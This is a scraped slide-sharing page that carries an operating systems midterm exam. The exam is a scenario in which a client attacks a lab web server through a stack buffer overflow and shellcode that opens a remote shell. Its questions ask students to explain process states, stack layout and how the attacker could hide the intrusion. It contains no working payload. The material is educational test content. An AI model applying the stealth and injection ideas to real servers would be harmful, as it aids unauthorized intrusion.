/50 /60 /40 /30 A Tale of Two Clients

Slides:



Advertisements
Similar presentations
Smashing the Stack for Fun and Profit
Advertisements

1 Processes and Pipes COS 217 Professor Jennifer Rexford.
CSCI 4550/8556 Computer Networks Comer, Chapter 3: Network Programming and Applications.
CS252: Systems Programming Ninghui Li Final Exam Review.
What is the output generated by this program? Please assume that each executed print statement completes, e.g., assume that each print is followed by an.
Distributed Computing Systems Project 2 – Distributed Shell Due: Friday, April 4 th.
Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-
Web Application Access to Databases. Logistics Test 2: May 1 st (24 hours) Extra office hours: Friday 2:30 – 4:00 pm Tuesday May 5 th – you can review.
(a) Alice and Bob are back together. Today Alice wants to send Bob a message that is secret and also authenticated, so that Bob "knows" the message came.
Attacking Applications: SQL Injection & Buffer Overflows.
Tutorial 8 Programming with ActionScript 3.0. XP Objectives Review the basics of ActionScript programming Compare ActionScript 2.0 and ActionScript 3.0.
Consider the short (and useless) C program off to the right. Each of the variables {a, b, c} references an integer value that occupies some memory at runtime.
Lecture 3 Process Concepts. What is a Process? A process is the dynamic execution context of an executing program. Several processes may run concurrently,
Fundamentals of Proxying. Proxy Server Fundamentals  Proxy simply means acting on someone other’s behalf  A Proxy acts on behalf of the client or user.
(a) What is the output generated by this program? In fact the output is not uniquely defined, i.e., it is not always the same. So please give three examples.
CE Operating Systems Lecture 13 Linux/Unix interprocess communication.
Consider the program fragment below left. Assume that the program containing this fragment executes t1() and t2() on separate threads running on separate.
(a) What is the output generated by this program? In fact the output is not uniquely defined, i.e., it is not necessarily the same in each execution. What.
EC week Review. Rules of Engagement Teams selected by instructor Host will read the entire questions. Only after, a team may “buzz” by raise of.
CSC 322 Operating Systems Concepts Lecture - 7: by Ahmed Mumtaz Mustehsan Special Thanks To: Tanenbaum, Modern Operating Systems 3 e, (c) 2008 Prentice-Hall,
Consider the Java code snippet below. Is it a legal use of Java synchronization? What happens if two threads A and B call get() on an object supporting.
R Some of these slides are from Prof Frank Lin SJSU. r Minor modifications are made. 1.
Lecture 5 Page 1 CS 111 Online Process Creation Processes get created (and destroyed) all the time in a typical computer Some by explicit user command.
A Tale of Two Clients Plot summary. In which a client Chuck (C) is having a pleasant exchange of requests and responses with server Sam (S), when Mary.
The Common Gateway Interface (CGI) Pat Morin COMP2405.
Midterm Review October Closed book one hand written page of notes of your own making October Closed book one hand written page of notes of.
Agenda Spoofing Types of Spoofing o IP Spoofing o URL spoofing o Referrer spoofing o Caller ID spoofing o Address Spoofing.
JavaScript Controlling the flow of your programs with ‘if’ statements
Buffer Overflows Incomplete Access Control
SQL Injection.
CPS 512/590 final exam, 12/8/2015 /60 Your name please: /50 /50 /60
Unit 20 - Client Side Customisation of Web Pages
Data Virtualization Tutorial… SSL with CIS Web Data Sources
Introduction to Operating Systems
Protecting Memory What is there to protect in memory?
Operating Systems Review ENCE 360.
CPS 310 midterm exam #1, 2/19/2016 Your name please: ___________________ NetID:___________ /40 /40 /50.
Protecting Memory What is there to protect in memory?
Protecting Memory What is there to protect in memory?
Module 4 Remote Login.
CPS 512 midterm exam #1, 10/7/2016 Your name please: ___________________ NetID:___________ /60 /40 /10.
Process Creation Processes get created (and destroyed) all the time in a typical computer Some by explicit user command Some by invocation from other running.
A Security Review Process for Existing Software Applications
CSC 495/583 Topics of Software Security Stack Overflows (2)
Swapping Segmented paging allows us to have non-contiguous allocations
CPS 512 midterm exam #1, 10/5/17 Your name please: NetID:_______ Sign for your honor:____________________________.
Applied Operating System Concepts
Computer Architecture “Bomb Lab Hints”
Introduction to Operating Systems
Realizing Concurrency using Posix Threads (pthreads)
GEOMATIKA UNIVERSITY COLLEGE CHAPTER 2 OPERATING SYSTEM PRINCIPLES
Threads and Data Sharing
Distrustful Decomposition
Exceptions Control Flow
Week 2: Buffer Overflow Part 2.
Realizing Concurrency using Posix Threads (pthreads)
First slide Rest of project 2 due next Friday Today:
Controlling Processes
Realizing Concurrency using Posix Threads (pthreads)
CS5123 Software Validation and Quality Assurance
PHP Forms and Databases.
CSE 153 Design of Operating Systems Winter 2019
Following Malware Execution in IDA
CS703 – Advanced Operating Systems
Understanding and Preventing Buffer Overflow Attacks in Unix
Preventing Privilege Escalation
Error Handling in Java Servlets
System and Cyber Security
Exploring DOM-Based Cross Site Attacks
Return-to-libc Attacks
Presentation transcript:

CPS 310 midterm exam #2, 4/1/16 Your name please: ___________________ NetID:___________ /50 /60 /40 /30 A Tale of Two Clients Plot summary. In which a client Chuck (C) is having a pleasant exchange of requests and responses with server Sam (S), when Mary (M) suddenly appears and attacks Sam. The scenario unfolds exactly as in the lab/project p2. Sam's server runs the "BuggyServer” code you studied for p2, ready to receive connections on port 9000. All processes involved are single-threaded. All participants run “classic Unix”. All processes use the various Unix system calls as discussed in class. The scenarios involve two simple and familiar Unix utility programs. The echo program simply writes its arguments to stdout. The nc program is netcat, which opens a socket and then uses read and write system calls to transfer data from its stdin to the socket and from the socket to its stdout. Instructions. Answer all questions. Please attempt to confine your answers to the boxes provided. The small boxes are worth 10 points. The large boxes are worth 20 points. Many questions on this exam ask you to explain process states of Chuck, Mary, and Sam at various stages in the narrative. For those questions, the state of a process is the state of its thread: either Running, Exited, or Blocked. If a process is Blocked, name the system call in which it is blocked and the object it is blocked on. Please assume that each process has had sufficient time to execute to reach a stable state. As always: “Any kind of pseudocode is fine as long as its meaning is clear. You may assume standard data structures, e.g., linked lists: don’t write code for those.” If you don’t know the answer to a question, then just say something else relevant for partial credit. There are no “April Fools” jokes on this exam, with the possible exception of this statement. /20 /200

CPS 310 midterm exam #2, 4/1/16, page 2 of 6 Part 1. In which Chuck sends a request. (50 points) Chuck types the following command to his shell to issue a valid HTTP request to Sam: /bin/echo "GET /file HTTP" | nc sam 9000 What is the state of Sam’s server process before the request is sent? Which of Chuck’s processes creates a pipe? How does another process gain access to the pipe? What is the state of each of Chuck’s processes after the request is sent, but before Sam's reply is received? List the key system calls that the nc process issues before arriving at the state in (c), in the order it issues them. What causes Chuck’s nc process to (eventually) exit?

CPS 310 midterm exam #2, 4/1/16, page 3 of 6 Part 2. In which Mary attacks Sam. (60 points) Mary types the following command to her shell to issue a valid HTTP request to Sam. The request contains a malicious attack string with an embedded shellcode to inject into Sam's server. Sam's server receives the attack string and copies it into a local buffer variable of its handle() procedure, overflowing the buffer. /bin/echo -e "GET <attack string> HTTP" | nc sam 9000 Why is it necessary for the copy to overflow the buffer in order for the attack to be successful? Mary must guess the location of the buffer in the server's virtual address space, and include a stack address within the attack string. Why is this necessary in order for the attack to be successful? Draw a picture of Sam’s server stack after the handle() procedure is called but before the copy operation occurs. Be sure to illustrate the key elements that are relevant to the attack. Draw a picture of Sam’s server stack after the copy operation but before handle() returns. Be sure to show the key regions of the attack string and their locations relative to the elements in (c). (c) before (d) after

CPS 310 midterm exam #2, 4/1/16, page 4 of 6 Part 3. In which Sam executes Mary's shellcode. (40 points) The shellcode is a sequence of machine instructions with the usual behavior: create a fresh socket, bind the socket to a port number (the shell port), listen/accept a connect request from Mary on the shell port, and use the execve system call to run a shell program that receives commands from Mary and sends their output back to her. One possible outcome is that the server process generates a fault when it executes its first instruction from Mary's attack string.(Let’s say the instruction is a NOP.) What is the most likely cause of the fault? If the attack succeeds in running a shell, what user identity does the attack shell run with? How does Sam’s kernel determine what user identity to place in the security label of the shell’s process? The nc process that Mary used to launch the attack (in Part 2) does not exit after the attack. Why not? How is it different from Chuck's nc process in Part 1? What is the state of Sam's server process after Mary connects to the shell port, but before she sends a shell command?

CPS 310 midterm exam #2, 4/1/16, page 5 of 6 Part 4. In which Chuck is out of luck. (30 points) Chuck repeats the command of Part 1 after Mary initiates the attack, but before Mary disconnects from her attack shell. /bin/echo "GET /file HTTP" | nc sam 9000 Chuck types the command, hits the return key, and....nothing happens. What is the state of Sam's server process at this point? What is the state of each of Chuck's processes at this point? What is the state of Sam's server process after Mary disconnects from the attack shell by exiting her client program?

CPS 310 midterm exam #2, 4/1/16, page 6 of 6 Part 5. In which Mary gets smarter and avoids detection. (20 points) One weakness of Mary’s shellcode is that Chuck might report his problem to Sam, who might then discover Mary's attack. If Mary is busted, she could forfeit her property and be imprisoned for 20 years under US Federal Penal Code 18 §1030 (CFAA, the Computer Fraud and Abuse Act), and regret this sorry episode for the rest of her miserable life. Propose a solution for Mary. Of course, Mary should not mount the attack at all, but if she is committed to this path of darkness, how could she modify her shellcode to hide her attack from Chuck? How could she avoid disrupting the functioning of Sam's webserver? Discuss any practical difficulties of your idea and any assumptions needed to overcome them.

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2025 SlidePlayer.com. Inc. All rights reserved.